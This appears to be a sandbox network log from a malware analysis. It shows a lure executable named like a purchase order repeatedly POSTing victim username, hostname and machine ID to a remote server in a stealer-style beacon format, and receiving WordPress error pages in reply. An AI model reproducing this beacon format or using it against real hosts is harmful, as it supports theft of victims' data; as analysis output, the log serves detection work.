Aug 29, 2024 12:03:11.192104101 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:14.150966883 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:11 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:14.150990009 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:14.151000977 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
Aug 29, 2024 12:03:14.151654959 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:11 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:14.152595043 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:11 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49729	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:14.293207884 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:14.298156977 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:16.695571899 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:14 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:16.695585966 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:16.695597887 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49730	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:16.841785908 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:16.846754074 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:19.141123056 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:17 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:19.141285896 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:19.141299009 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49731	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:19.301708937 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:19.308275938 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:21.616108894 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:19 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:21.616139889 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:21.616154909 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49732	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:21.761614084 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:21.768470049 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:24.159673929 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:22 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
